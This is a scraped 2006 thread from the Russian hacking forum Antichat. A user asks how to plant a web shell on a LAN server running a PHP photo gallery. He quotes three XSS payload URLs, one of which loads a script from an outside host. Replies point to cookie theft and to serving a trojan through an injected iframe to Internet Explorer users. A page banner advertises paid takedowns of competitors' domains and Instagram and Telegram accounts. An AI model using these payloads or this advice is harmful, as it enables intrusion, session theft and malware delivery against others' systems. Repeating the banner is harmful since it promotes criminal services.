Форум АНТИЧАТ - Залить шелл?

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Залить шелл?

Опции темы

Поиск в этой теме

Опции просмотра

Залить шелл?

02.11.2006, 19:52

InterAct

Новичок

Регистрация: 20.03.2005

Сообщений: 4

Провел на форуме:
1926

Репутация: 0

Залить шелл?

Привет!
В локалке есть сервак под хр sp2, на нем фото галерея PHP Photo Album by John Beatty,
На енту галерею есть сплоит

http://www.example.com/photos/showimages.php?dir=<iframe%20src="C:\"%20width=400 %20height=400></iframe>
http://www.example.com//photos/showfullimage.php?dir=[dir name][spc]St[spc]Clair&image=<h1>hello</h1>
http://172.17.30.2/showfullimage.php?dir=&image=<script%20language=Ja vascript%20src=http://test/users/alex/tooltiq.js></script>
можно ли как залить на сервак шелл, бекдор, или как прочесть с помощь html, js… пхп файл на серваку?

02.11.2006, 21:14

degeneration x

Познающий

Регистрация: 11.10.2005

Сообщений: 97

Провел на форуме:
732018

Репутация: 117

Никак ) Это хсс атака, а не инклюдинг.

02.11.2006, 21:27

InterAct

Новичок

Регистрация: 20.03.2005

Сообщений: 4

Провел на форуме:
1926

Репутация: 0

Очень жаль (. Что самое пакостное можно сделать с этим?

Последний раз редактировалось InterAct; 02.11.2006 в 21:30..

02.11.2006, 23:25

nc.STRIEM

Members of Antichat - Level 5

Регистрация: 05.04.2006

Сообщений: 1,066

Провел на форуме:
3493315

Репутация: 1228

Отправить сообщение для nc.STRIEM с помощью ICQ

Цитата:

Сообщение от InterAct

Очень жаль (. Что самое пакостное можно сделать с этим?

украсть куки если XSS в профиле! или загрузить какойнить файл на комп юзера впарив ему ссылку (правд тут есть пару нюансов)

__________________
No СПлоА - No World!
Как узнать информацию о посетителях сайта

02.11.2006, 23:58

InterAct

Новичок

Регистрация: 20.03.2005

Сообщений: 4

Провел на форуме:
1926

Репутация: 0

давай сюда нюансы

03.11.2006, 00:16

nc.STRIEM

Members of Antichat - Level 5

Регистрация: 05.04.2006

Сообщений: 1,066

Провел на форуме:
3493315

Репутация: 1228

Использую Xss ты можеш создать фрейм в который будет подружаться твоя страничка, собсно которая будет загружать сам файл (трой) на комп жертвы, но это возможно не во всех браузерах а конкретно в Ie, и во многом зависит от настроек юзера!

А ваше посмотри видео про XSS СКАЧАТЬ

__________________
No СПлоА - No World!
Как узнать информацию о посетителях сайта

Последний раз редактировалось nc.STRIEM; 03.11.2006 в 00:22..

03.11.2006, 02:06

InterAct

Новичок

Регистрация: 20.03.2005

Сообщений: 4

Провел на форуме:
1926

Репутация: 0

Спасибо! Посмотрим )

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Как залить шелл в vBulletin v3.6.0?	Elenberg	Форумы	19	06.02.2009 10:00
Подскажите альтернативный способ залить шелл.	_link	Форумы	1	11.03.2006 07:47
ExBB 1.9.1 - залить шелл	TweakeR	Форумы	9	09.02.2006 12:29
Залить шелл через подделку http запросов, на примере ipb 1.3	SURRENDER	Форумы	25	13.04.2005 15:37
Как залить шелл через PhPBB	SheFF	Форумы	5	29.11.2004 01:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход